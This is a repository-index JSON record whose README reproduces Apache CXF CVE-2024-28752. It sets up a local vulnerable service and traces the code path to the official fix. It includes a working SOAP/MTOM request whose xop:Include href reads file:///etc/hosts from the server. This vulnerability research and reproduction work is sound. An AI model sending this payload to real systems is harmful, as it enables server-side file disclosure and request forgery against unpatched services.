{"id":28373884,"url":"https://github.com/reajason/cve-2024-28752","last_synced_at":"2025-06-25T18:31:08.713Z","repository":{"id":292487800,"uuid":"981056220","full_name":"ReaJason/CVE-2024-28752","owner":"ReaJason","description":"Apache CXF SSRF CVE-2024-28752","archived":false,"fork":false,"pushed_at":"2025-05-10T12:09:12.000Z","size":148,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-05-29T20:50:33.890Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ReaJason.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-05-10T08:36:41.000Z","updated_at":"2025-05-10T12:09:15.000Z","dependencies_parsed_at":"2025-05-10T09:31:24.366Z","dependency_job_id":"761b8043-cdee-4889-b96e-ea9f63baae31","html_url":"https://github.com/ReaJason/CVE-2024-28752","commit_stats":null,"previous_names":["reajason/cve-2024-28752"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ReaJason/CVE-2024-28752","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752/manifests","owner_url":"https://repos.ecosyste.m
s/api/v1/hosts/GitHub/owners/ReaJason","download_url":"https://codeload.github.com/ReaJason/CVE-2024-28752/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ReaJason%2FCVE-2024-28752/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":261930464,"owners_count":23231886,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-05-29T20:37:47.527Z","updated_at":"2025-06-25T18:31:08.700Z","avatar_url":"https://github.com/ReaJason.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"## Apache CXF CVE-2024-28752 Reproduction Environment\n\n\u003e Security advisory: https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt\n\n### Starting the environment\n\n\u003e [samples/java_first_jaxws_factory_bean](https://github.com/apache/cxf/tree/main/distribution/src/main/release/samples/java_first_jaxws_factory_bean)\n\n#### IDEA\n\nStart the web service by running [ServerStarter.java](./src/main/java/ServerStarter.java)\n\n#### Build\n\n\u003e Use JDK 8\n\n```bash\nmvn clean package\n\njava -jar target/cxf.jar\n```\n\n### Exploitation\n\nSending the following request with Burp Suite triggers the vulnerability.\n\n```http request\nPOST /test HTTP/1.1\nHost: 127.0.0.1:8080\nContent-Type: multipart/related; boundary=----kkkkkk123123213\nContent-Length: 472\nConnection: close\n\n------kkkkkk123123213\nContent-Disposition: form-data; name=\"1\"\n\n\u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"http://service.namespace/\"\u003e\n   \u003csoapenv:Header/\u003e\n   \u003csoapenv:Body\u003e\n      \u003cweb:test\u003e\n         
\u003carg0\u003e\n\u003ccount\u003e\u003cxop:Include xmlns:xop=\"http://www.w3.org/2004/08/xop/include\" href=\"file:///etc/hosts\"\u003e\u003c/xop:Include\u003e\u003c/count\u003e\n\u003c/arg0\u003e\n      \u003c/web:test\u003e\n   \u003c/soapenv:Body\u003e\n\u003c/soapenv:Envelope\u003e\n------kkkkkk123123213--\n\n```\n\n![burp.png](./asserts/burp.png)\n\n### Vulnerability analysis\n\nBelow is the stack trace of the file read. The xop:Include element is parsed by the MTOMDecorator class.\n\n```text\n\u003cinit\u003e:93, FileInputStream (java.io)\nconnect:90, FileURLConnection (sun.net.www.protocol.file)\ngetInputStream:188, FileURLConnection (sun.net.www.protocol.file)\nopenStream:1092, URL (java.net)\ngetInputStream:107, URLDataSource (javax.activation)\nget:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nlength:212, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\n_parseInt:94, DatatypeConverterImpl (com.sun.xml.internal.bind)\nparse:725, RuntimeBuiltinLeafInfoImpl$18 (com.sun.xml.internal.bind.v2.model.impl)\nparse:723, RuntimeBuiltinLeafInfoImpl$18 (com.sun.xml.internal.bind.v2.model.impl)\ntext:54, TextLoader (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\ntext:572, UnmarshallingContext (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nstartElement:92, MTOMDecorator (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nhandleStartElement:231, StAXStreamConnector (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nbridge:165, StAXStreamConnector (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nunmarshal0:400, UnmarshallerImpl (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\nunmarshal:379, UnmarshallerImpl (com.sun.xml.internal.bind.v2.runtime.unmarshaller)\ndoUnmarshal:887, JAXBEncoderDecoder (org.apache.cxf.jaxb)\naccess$200:103, JAXBEncoderDecoder (org.apache.cxf.jaxb)\nrun:926, JAXBEncoderDecoder$3 (org.apache.cxf.jaxb)\ndoPrivileged:-1, AccessController (java.security)\nunmarshall:924, JAXBEncoderDecoder (org.apache.cxf.jaxb)\nunmarshall:744, JAXBEncoderDecoder 
(org.apache.cxf.jaxb)\nread:172, DataReaderImpl (org.apache.cxf.jaxb.io)\nhandleMessage:109, DocLiteralInInterceptor (org.apache.cxf.wsdl.interceptors)\ndoIntercept:308, PhaseInterceptorChain (org.apache.cxf.phase)\nonMessage:121, ChainInitiationObserver (org.apache.cxf.transport)\n```\n\nThe href value is handled by the AttachmentUnmarshaller class.\n\n```java\nclass MTOMDecorator implements XmlVisitor {\n    public void startElement(TagName tagName) throws SAXException {\n        if (tagName.local.equals(\"Include\") \u0026\u0026 tagName.uri.equals(\"http://www.w3.org/2004/08/xop/include\")) {\n            String href = tagName.atts.getValue(\"href\");\n            DataHandler attachment = this.au.getAttachmentAsDataHandler(href);\n            if (attachment == null) {\n                this.parent.getEventHandler().handleEvent((ValidationEvent) null);\n            }\n\n            this.base64data.set(attachment);\n            this.next.text(this.base64data);\n            this.inXopInclude = true;\n            this.followXop = true;\n        } else {\n            this.next.startElement(tagName);\n        }\n    }\n}\n```\n\nThe default implementation of AttachmentUnmarshaller is `com.sun.xml.internal.ws.message.AttachmentUnmarshallerImpl`, which only resolves content IDs present in the current attachments.\n\n```java\npublic final class AttachmentUnmarshallerImpl extends AttachmentUnmarshaller {\n\n    public DataHandler getAttachmentAsDataHandler(String cid) {\n        Attachment a = this.attachments.get(this.stripScheme(cid));\n        if (a == null) {\n            throw new WebServiceException(EncodingMessages.NO_SUCH_CONTENT_ID(cid));\n        } else {\n            return a.asDataHandler();\n        }\n    }\n\n    private String stripScheme(String cid) {\n        if (cid.startsWith(\"cid:\")) {\n            cid = cid.substring(4);\n        }\n\n        return cid;\n    }\n}\n```\n\nIn Apache CXF, however, the implementation class is `org.apache.cxf.jaxb.attachment.JAXBAttachmentUnmarshaller`, which extends this logic.\n\nA common SSRF payload such as `file:///` or `http://xxx` will initialise a 
URLDataSource. The official fix is also applied at this point:\n[apache/cxf@659a8](https://github.com/apache/cxf/commit/659a8f9b10bc8037774c0399e61e77e3955fd230)\n\n```java\npublic final class AttachmentUtil {\n    public static DataSource getAttachmentDataSource(String contentId, Collection\u003cAttachment\u003e atts) {\n        if (contentId.startsWith(\"cid:\")) {\n            try {\n                contentId = URLDecoder.decode(contentId.substring(4), StandardCharsets.UTF_8.name());\n            } catch (UnsupportedEncodingException var3) {\n                contentId = contentId.substring(4);\n            }\n            return loadDataSource(contentId, atts);\n        } else if (contentId.indexOf(\"://\") == -1) {\n            return loadDataSource(contentId, atts);\n        } else {\n            try {\n                return new URLDataSource(new URL(contentId));\n            } catch (MalformedURLException e) {\n                throw new Fault(e);\n            }\n        }\n    }\n}\n\npublic class URLDataSource implements DataSource {\n    public InputStream getInputStream() throws IOException {\n        return this.url.openStream();\n    }\n}\n```\n\nFinally, Base64Data calls getInputStream, which triggers url.openStream() to read the data; the content is then Base64-encoded for transmission.\n\n```java\npublic final class Base64Data extends Pcdata {\n    public byte[] get() {\n        if (this.data == null) {\n            try {\n                ByteArrayOutputStreamEx baos = new ByteArrayOutputStreamEx(1024);\n                InputStream is = this.dataHandler.getDataSource().getInputStream();\n                baos.readFrom(is);\n                is.close();\n                this.data = baos.getBuffer();\n                this.dataLen = baos.size();\n            } catch (IOException var3) {\n                this.dataLen = 0;\n            }\n        }\n\n        return this.data;\n    }\n\n    public void writeTo(char[] buf, int start) {\n        this.get();\n        DatatypeConverterImpl._printBase64Binary(this.data, 0, this.dataLen, buf, start);\n    }\n\n    
public void writeTo(UTF8XmlOutput output) throws IOException {\n        this.get();\n        output.text(this.data, this.dataLen);\n    }\n\n    public void writeTo(XMLStreamWriter output) throws IOException, XMLStreamException {\n        this.get();\n        DatatypeConverterImpl._printBase64Binary(this.data, 0, this.dataLen, output);\n    }\n}\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Freajason%2Fcve-2024-28752","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Freajason%2Fcve-2024-28752","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Freajason%2Fcve-2024-28752/lists"}